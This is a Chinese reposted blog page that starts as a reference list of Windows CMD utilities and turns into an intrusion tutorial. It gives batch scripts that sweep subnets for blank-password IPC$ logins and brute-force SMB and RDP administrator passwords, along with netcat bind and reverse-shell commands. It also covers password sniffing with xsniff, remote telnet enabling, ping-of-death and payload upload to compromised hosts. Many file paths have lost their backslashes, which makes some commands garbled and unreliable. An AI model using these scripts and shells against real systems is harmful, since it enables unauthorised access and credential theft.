簡介
cmd
是command
的縮寫.即命令行
雖然隨着計算機產業的發展,Windows 操作系統的應用越來越廣泛,DOS 面臨着被淘汰的命運,但是因爲它運行安全、穩定,有的用戶還在使用,所以一般Windows 的各種版本都與其兼容,用戶可以在Windows 系統下運行DOS,中文版Windows XP 中的命令提示符進一步提高了與DOS 下操作命令的兼容性,用戶可以在命令提示符直接輸入中文調用文件。
在9x系統下輸入command
就可以打開命令行.而在NT系統上可以輸入cmd
來打開,在windows2003後被cmd替代,利用CMD
命令查詢系統的信息或者是判斷網絡的好壞。下圖爲CMD
啓動後的界面。
運行操作
CMD
命令:開始->運行->鍵入cmd或command
(在命令行裏可以看到系統版本、文件系統版本)
CMD命令錦集
gpedit.msc
-----組策略sndrec32
-------錄音機Nslookup
-------IP地址偵測器 ,是一個 監測網絡中 DNS 服務器是否能正確實現域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中卻沒有集成這一個工具。explorer
-------打開資源管理器logoff
---------註銷命令shutdown
-------60秒倒計時關機命令lusrmgr.msc
----本機用戶和組services.msc
—本地服務設置oobe/msoobe /a
----檢查XP是否激活notepad
--------打開記事本cleanmgr
-------垃圾整理net start messenger
----開始信使服務compmgmt.msc
—計算機管理net stop messenger
-----停止信使服務conf
-----------啓動netmeetingdvdplay
--------DVD播放器charmap
--------啓動字符映射表diskmgmt.msc
—磁盤管理實用程序calc
-----------啓動計算器dfrg.msc
-------磁盤碎片整理程序chkdsk.exe
-----Chkdsk磁盤檢查devmgmt.msc
— 設備管理器regsvr32 /u *.dll
----停止dll文件運行drwtsn32
------ 系統醫生rononce -p
----15秒關機dxdiag
---------檢查DirectX信息regedt32
-------註冊表編輯器Msconfig.exe
—系統配置實用程序rsop.msc
-------組策略結果集mem.exe
--------顯示內存使用情況regedit.exe-
—註冊表winchat
--------XP自帶局域網聊天progman
--------程序管理器winmsd
---------系統信息perfmon.msc
----計算機性能監測程序winver
---------檢查Windows版本sfc /scannow
-----掃描錯誤並復原taskmgr
-----任務管理器(2000/xp/2003wmimgmt.msc
----打開windows管理體系結構(WMI)wupdmgr
--------windows更新程序wscript
--------windows腳本宿主設置write
----------寫字板wiaacmgr
-------掃描儀和照相機嚮導winchat
--------XP自帶局域網聊天mplayer2
-------簡易widnows media playermspaint
--------畫圖板mstsc
----------遠程桌面連接mmc
--------放大鏡實用程序mmc
------------打開控制檯mobsync
--------同步命令iexpress
-------木馬捆綁工具,系統自帶fsmgmt.msc
-----共享文件夾管理器utilman
--------輔助工具管理器dcomcnfg
-------打開系統組件服務ddeshare
-------打開DDE共享設置osk
------------打開屏幕鍵盤odbcad32
-------ODBC數據源管理器oobe/msoobe /a
----檢查XP是否激活ntbackup
-------系統備份和還原narrator
-------屏幕“講述人”ntmsmgr.msc
----移動存儲管理器ntmsoprq.msc
—移動存儲管理員操作請求netstat -an
----(TC)命令檢查接口syncapp
--------創建一個公文包sysedit
--------系統配置編輯器sigverif
-------文件簽名驗證程序ciadv.msc
------索引服務程序shrpubw
--------創建共享文件夾secpol.msc
-----本地安全策略syskey
---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼services.msc
—本地服務設置Sndvol32
-------音量控制程序sfc.exe
--------系統文件檢查器sfc /scannow
—windows文件保護ciadv.msc
------索引服務程序tourstart
------xp簡介(安裝完成後出現的漫遊xp程序)taskmgr
--------任務管理器eventvwr
-------事件查看器eudcedit
-------造字程序compmgmt.msc
—計算機管理packager
-------對象包裝程序perfmon.msc
----計算機性能監測程序charmap
--------啓動字符映射表cliconfg
-------SQL SERVER 客戶端網絡實用程序Clipbrd
--------剪貼板查看器conf
-----------啓動netmeetingcertmgr.msc
----證書管理實用程序regsvr32 /u *.dll
----停止dll文件運行regsvr32 /u zipfldr.dll
------取消ZIP支持cmd.exe
--------CMD命令提示符
操作詳解
net use ipipc$ " " /user:" "
建立IPC空鏈接net use ipipc$ "密碼" /user:"用戶名"
建立IPC非空鏈接net use h: ipc$ "密碼" /user:"用戶名"
直接登陸後映射對方C:到本地爲H:net use h: ipc$
登陸後映射對方C:到本地爲H:net use ipipc$ /del
刪除IPC鏈接net use h: /del
刪除映射對方到本地的爲H:的映射net user
用戶名 密碼 /add 建立用戶net user
guest /active:yes 激活guest用戶net user
查看有哪些用戶net user
帳戶名 查看帳戶的屬性net localgroup administrators 用戶名 /add
把“用戶”添加到管理員中使其具有管理員權限net start
查看開啓了哪些服務net start 服務名
開啓服務;(如:net start telnet, net start schedule)net stop 服務名
停止某服務net time 目標ip
查看對方時間net time 目標ip /set
設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息net view
查看本地局域網內開啓了哪些共享net view ip
查看對方局域網內開啓了哪些共享net config
顯示系統網絡設置net logoff
斷開連接的共享net pause 服務名
暫停某服務net send ip "文本信息"
向對方發信息net ver
局域網內正在使用的網絡連接類型和信息net share
查看本地開啓的共享net share ipc$
開啓ipc$共享net share ipc$ /del
刪除ipc$共享net share c$ /del
刪除C:共享net user guest 12345
用guest用戶登陸後用將密碼改爲12345net password 密碼
更改系統登陸密碼netstat -a
查看開啓了哪些端口,常用netstat -annetstat -n
查看端口的網絡連接情況,常用netstat -annetstat -v
查看正在進行的工作netstat -p
協議名 例:netstat -p tcq/ip 查看某協議使用情況netstat -s
查看正在使用的所有協議使用情況nbtstat -A ip
對方136到139其中一個端口開了的話,就可查看對方最近登陸的用戶名tracert -參數 ip(或計算機名)
跟蹤路由(數據包),參數:“-w數字”用於設置超時間隔。ping ip(或域名)
向對方主機發送默認大小爲32字節的數據,參數:“-l[空格]數據包大小”;“-n發送數據次數”;“-t”指一直ping。ping -t -l 65550 ip
死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)ipconfig (winipcfg)
用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“/all”顯示全部配置信息tlist -t
以樹行列表顯示進程(爲系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)kill -F
進程名 加-F參數後強制結束某進程(爲系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)del -F 文件名
加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR .”表示刪除當前目錄下所有隻讀文件,“DEL/A-S .”表示刪除當前目錄下除系統文件以外的所有文件del /S /Q 目錄 或用:rmdir /s /Q 目錄
/S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)move
盤符路徑要移動的文件名 存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋fc one.txt two.txt > 3st.txt
對比二個文件並把不同之處輸出到3st.txt文件中,"> “和”> >" 是重定向命令at id號
開啓已註冊的某個計劃任務at /delete
停止所有計劃任務,用參數/yes則不需要確認就直接停止at id號 /delete
停止某個已註冊的計劃任務at
查看所有的計劃任務at ip time 程序名(或一個命令) /r
在某時間運行對方某程序並重新啓動計算機finger username @host
查看最近有哪些用戶登陸telnet ip 端口
遠和登陸服務器,默認端口爲23open ip
連接到IP(屬telnet登陸後的命令)telnet
在本機上直接鍵入telnet 將進入本機的telnetcopy 路徑文件名1 路徑文件名2 /y
複製文件1到指定的目錄爲文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件copy c:srv.exe ipadmin$
複製本地c:srv.exe到對方的admin下copy 1st.jpg/b+2st.txt/a 3st.jpg
將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件copy ipadmin$svv.exe c: 或:copyipadmin$*.*
複製對方admini$共享下的srv.exe文件(所有文件)至本地C:xcopy
要複製的文件或目錄樹 目標地址目錄名 複製文件和目錄樹,用參數/Y將不提示覆蓋相同文件 用參數/e纔可連目錄下的子目錄一起復制到目標地址下。tftp -i
自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後,將“IP”的server.exe下載到目標主機c:server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送tftp -i
對方IP put c:server.exe` 登陸後,上傳本地c:server.exe至主機ftp ip 端口
用於上傳文件至服務器或進行文件操作,默認端口爲21。bin指用二進制方式傳送(可執行文件進);默認爲ASCII格式傳送(文本文件時)route print
顯示出IP路由,將主要顯示網絡地址Network addres,子網掩碼Netmask,網關地址Gateway addres,接口地址Interfacearp
查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息start 程序名或命令 /max 或/min
新開一個新窗口並最大化(最小化)運行某程序或命令mem
查看cpu使用情況attrib 文件名(目錄名)
查看某文件(目錄)的屬性attrib 文件名
-A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加爲某屬性dir
查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間date /t 、 time /t
使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間,而不必輸入新日期和時間set 指定環境變量名稱=要指派給變量的字符
設置環境變量set
顯示當前所有的環境變量set p(或其它字符)
顯示出當前以字符p(或其它字符)開頭的所有環境變量pause
暫停批處理程序,並顯示出:請按任意鍵繼續…if
在批處理程序中執行條件處理(更多說明見if命令及變量)goto
標籤 將cmd.exe導向到批處理程序中帶標籤的行(標籤必須單獨一行,且以冒號打頭,例如:“:start”標籤)call
路徑批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call /?)for
對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變量)echo on或off
打開或關閉echo,僅用echo不加參數則顯示當前echo設置echo 信息
在屏幕上顯示出信息echo 信息 >> pass.txt
將"信息"保存到pass.txt文件中findstr "Hello" aa.txt
在aa.txt文件中尋找字符串hellofind 文件名
查找某文件title 標題名字
更改CMD窗口標題名字color 顏色值
設置cmd控制檯前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt 名稱
更改cmd.exe的顯示的命令提示符(把C:、D:統一改爲:EntSky )ver
在DOS窗口下顯示版本信息winver
彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)format 盤符 /FS:類型
格式化磁盤,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFSmd 目錄名
創建目錄replace 源文件
要替換文件的目錄 替換文件ren 原文件名 新文件名
重命名文件名tree
以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱type 文件名
顯示文本文件的內容more 文件名
逐屏顯示輸出文件doskey
要鎖定的命令=字符doskey 要解鎖命令=
爲DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=taskmgr
調出任務管理器chkdsk /F D:
檢查磁盤D並顯示狀態報告;加參數/f並修復磁盤上的錯誤tlntadmn
telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認端口23爲其它任何端口exit
退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exepath
路徑可執行文件的文件名 爲可執行文件設置一個路徑。cmd
啓動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啓命令擴展;更我詳細說明見cmd /?regedit /s
註冊表文件名 導入註冊表;參數/S指安靜模式導入,無任何提示;regedit /e
註冊表文件名 導出註冊表cacls 文件名 參數
顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問權限;/G 用戶名:perm 賦予指定用戶訪問權限;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。cacls 文件名
查看文件的訪問用戶權限列表REM 文本內容
在批處理文件中添加註解netsh
查看或更改本地網絡配置情況
win2003系統下新增命令(實用部份)
shutdown /參數
關閉或重啓本地或遠程主機。參數說明:/S
關閉主機,/R 重啓主機, /T 數字 設定延時的時間,範圍0~180秒之間, /A取消開機,/M //IP 指定的遠程主機。
例:shutdown /r /t 0 立即重啓本地主機(無延時)taskill /參數
進程名或進程的pid 終止一個或多個任務和進程。參數說明:/PID
要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啓動的子進程。tasklist
顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。參數說明:/M
列出當前進程加載的dll文件,/SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程。
IIS服務命令
iisreset /reboot
重啓win2k計算機(但有提示系統將重啓信息出現)iisreset /start或stop
啓動(停止)所有Internet服務iisreset /restart
停止然後重新啓動所有Internet服務iisreset /status
顯示所有Internet服務狀態iisreset /enable或disable
在本地系統上啓用(禁用)Internet服務的重新啓動iisreset /rebootonerror
當啓動、停止或重新啓動Internet服務時,若發生錯誤將重新開機iisreset /noforce
若無法停止Internet服務,將不會強制終止Internet服務iisreset /timeout
Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機。預設值爲重新啓動20秒,停止60秒,重新開機0秒。
FTP 命令
ftp的命令行格式爲:
ftp -v -d -i -n -g[主機名]
-v 顯示遠程服務器的所有響應信息。
-d 使用調試方式。
-n 限制ftp的自動登錄,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令]
查看命令說明bye 或 quit
終止主機FTP進程,並退出FTP管理方式.pwd
列出當前遠端主機目錄put 或 send 本地文件名 [上傳到主機上的文件名]
將本地一個文件傳送至遠端主機中get 或 recv [遠程主機文件名] [下載到本地後的文件名]
從遠端主機中傳送至本地主機中mget [remote-files]
從遠端主機接收一批文件至本地主機mput local-files
將本地主機中一批文件傳送至遠端主機dir 或 ls [remote-directory] [local-file]
列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件ascii
設定以ASCII方式傳送文件(缺省值)bin 或 image
設定以二進制方式傳送文件bell
每完成一次文件傳送,報警提示cdup
返回上一級目錄close
中斷與遠程服務器的ftp會話(與open對應)open host[port]
建立指定ftp服務器連接,可指定連接端口delete
刪除遠端主機中的文件mdelete [remote-files]
刪除一批文件mkdir directory-name
在遠端主機中建立目錄rename [from] [to]
改變遠端主機中的文件名rmdir directory-name
刪除遠端主機中的目錄status
顯示當前FTP的狀態system
顯示遠端主機系統類型user user-name [password] [account]
重新以別的用戶名登錄遠端主機open host [port]
重新建立一個新的連接prompt
交互提示模式macdef
定義宏命令lcd
改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄chmod
改變遠端主機的文件權限case
當爲ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換爲小寫字母cd remote-dir
進入遠程主機目錄cdup
進入遠程主機目錄的父目錄!
在本地機中執行交互shell,exit回到ftp環境,如!ls*.zip
MYSQL 命令
mysql -h主機地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。(例:mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其它也一樣)
exit
退出MYSQLmysqladmin -u用戶名 -p舊密碼 password 新密碼
修改密碼grant select on 數據庫.* to 用戶名@登錄主機 identified by "密碼";
增加新用戶。(注意:和上面不同,下面的因爲是MYSQL環境中的命令,所以後面都帶一個分號作爲命令結束符)show databases;
顯示數據庫列表。剛開始時才兩個數據庫:mysql和test。mysql庫很重要它裏面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作。use mysql;
show tables;
顯示庫中的數據表describe 表名;
顯示數據表的結構create database 庫名;
建庫use 庫名;
create table 表名 (字段設定列表);
建表drop database 庫名;
drop table 表名;
刪庫和刪表delete from 表名;
將表中記錄清空select * from 表名;
顯示錶中的記錄mysqldump --opt school>school.bbb 備份數據庫:
(命令在DOS的mysqlin目錄下執行);註釋:將數據庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取,打開看看你會有新發現。
批處理命令與變量
for命令及變量
基本格式: FOR /參數 %variable IN (set) DO command [command_parameters]
%variable
:指定一個單一字母可替換的參數,如:%i ,而指定一個變量則用:%%i ,而調用變量時用:%i% ,變量是區分大小寫的(%i 不等於 %I)。
批處理每次能處理的變量從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認爲使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use ipipc$ pass /user:user 中ip爲%1,pass爲%2 ,user爲%3(set)
:指定一個或一組文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1 }command
:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開command_parameters
:爲特定命令指定參數或命令行開關IN (set)
:指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{ (set)爲增量形式時 };/F 指從文件中不斷取值,直到取完爲止{ (set)爲文件時,如(d:pass.txt)時 }。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存爲test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼爲空的IPC$連接,如果成功就把該IP存在test.txt中。
- /L指用增量形式(即從1-254或254-1);
- 輸入的IP前面三位:..*爲批處理默認的 %1;
- %%G 爲變量(ip的最後一位);
- & 用來隔開echo 和net use 這二個命令;
- | 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"信息;
- %1.%%G 爲完整的IP地址;
- (1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存爲:ok.exe 說明:輸入一個IP後,用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼,直到文件中值取完爲止。
- %%i爲用戶名;
- %1爲輸入的IP地址(默認)。
if命令及變量
基本格式:IF [not] errorlevel 數字 命令語句
如果程序運行最後返回一個等於或大於指定數字的退出編碼,指定條件爲“真”。
0 指發現併成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字符串1==字符串2 命令語句
如果指定的文本字符串匹配(即:字符串1 等於 字符串2),就執行後面的命令。
例:“if "%2%"=="4" goto start
”指:如果輸入的第二個變量爲4時,執行後面的命令(注意:調用變量時就%變量名%並加" ")
IF [not] exist 文件名
命令語句 如果指定的文件名存在,就執行後面的命令。
例:“if not nc.exe goto end
”指:如果沒有發現nc.exe文件就跳到":end"標籤處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字符串1==字符串2 命令語句 else 命令語句
或 ·IF [not] exist 文件名 命令語句 else 命令語句· 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命令。
注意:else 必須與 if 在同一行纔有效。
當有del命令時需把del命令全部內容用< >括起來,因爲del命令要單獨一行時才能執行,用上< >後就等於是單獨一行了;
例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing
”,注意命令中的“.”
系統外部命令
注:系統外部命令(均需下載相關工具)
瑞士軍刀:nc.exe
基本用法:
nc -nvv 192.168.0.1 80
連接到192.168.0.1主機的80端口nc -l -p 80
開啓本機的TCP 80端口並監聽nc -nvv -w2 -z 192.168.0.1 80-1024
掃錨192.168.0.1的80-1024端口nc -l -p 5354 -t -e c:winntsystem32cmd.exe
綁定remote主機的cmdshell在remote的TCP 5354端口nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354
梆定remote主機的cmdshell並反向連接192.168.0.2的5354端口
高級用法:
nc -L -p 80
作爲蜜罐用1:開啓並不停地監聽80端口,直到CTR+C爲止nc -L -p 80 > c:log.txt
作爲蜜罐用2:開啓並不停地監聽80端口,直到CTR+C,同時把結果輸出到c:log.txtnc -L -p 80 < c:honeyport.txt
作爲蜜罐用3-1:開啓並不停地監聽80端口,直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用type.exe c:honeyport | nc -L -p 80
作爲蜜罐用3-2:開啓並不停地監聽80端口,直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機端口
在對方主機上用:nc -e cmd.exe 本機IP -p 本機端口 *win2Knc -e /bin/sh 本機IP -p 本機端口
*linux,unix 反向連接突破對方主機的防火牆
本機上用:nc -d -l -p 本機端口 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機端口 > 存放文件的路徑及名稱 傳送文件到對方主機
備 注
|
管道命令< 或 >
重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令@
表示執行@後面的命令,但不會顯示出來(後臺執行);例:@dir c:winnt >> d:log.txt 意思是:後臺執行dir,並把結果存在d:log.txt中
‘’>與’>>'的區別 ">“指:覆蓋;”>>"指:保存到(添加到)。
如:
@dir c:winnt >> d:log.txt和
@dir c:winnt > d:log.txt`二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是因爲第二次的結果把第一次的覆蓋了。
掃描工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項]
掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項]
掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的端口狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫權限
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 加載Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網絡適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網絡適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放端口的主機
-t 併發線程數量,併發主機數量 指定最大併發線程數量和併發主機數量, 默認數量爲100,10
-log 文件名 指定掃描報告文件名 (後綴爲:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p
檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o
檢測192.168.1.1-192.168.255.255網段內主機的標準端口狀態,NT弱口令用戶,最大併發線程數量爲150,跳過沒有檢測到開放端口的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o
檢測“hostlist.txt”文件中列出的所有主機的標準端口狀態,CGI漏洞,最大併發線程數量爲200,同一時刻最多檢測5臺主機,顯示詳細檢測進度,跳過沒有檢測到開放端口的主機
命令行方式嗅探器: xsniff.exe
可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後臺運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 端口 過濾端口
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log
後臺運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1
嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出
終端服務密碼破解: tscrack.exe
參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic
遠程用密碼字典文件暴破主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456
用密碼123456遠程登陸192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
存爲3389.bat(假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接着運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
存爲hack.bat (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼,並將破解結果保存在rouji.txt文件中。
其它
Shutdown.exe
Shutdown IP地址 t:20
20秒後將對方NT自動關閉
fpipe.exe (TCP端口重定向工具)
fpipe -l 80 -s 1029 -r 80
當有人掃錨你的80端口時,他掃到的結果會完全是的主機信息
Fpipe -l 23 -s 88 -r 23 目標IP
把本機向目標IP發送的23端口Telnet請求經端口重定向後,就通過88端口發送到目標IP的23端口。(與目標IP建立Telnet時本機就用的88端口與其相連接)然後:直接Telnet 127.0.0.1(本機IP)就連接到目標IP的23端口了。
OpenTelnet.exe (遠程開啓telnet工具)
opentelnet.exe IP 帳號 密碼 ntlm認證方式 Telnet端口
(不需要上傳ntlm.exe破壞微軟的身份驗證方式)直接遠程開啓對方的telnet服務後,就可用telnet ip 連接上對方。
NTLM認證方式:
0:不使用NTLM身份驗證;
1:先嚐試NTLM身份驗證,如果失敗,再使用用戶名和密碼;
2:只使用NTLM身份驗證。
ResumeTelnet.exe (OpenTelnet附帶的另一個工具)
resumetelnet.exe IP 帳號 密碼
用Telnet連接完對方後,就用這個命令將對方的Telnet設置還原,並同時關閉Telnet服務。
本文內容來自網絡,經過整理和排版更適合閱讀,內容來自:https://www.cnblogs.com/accumulater/p/7110811.html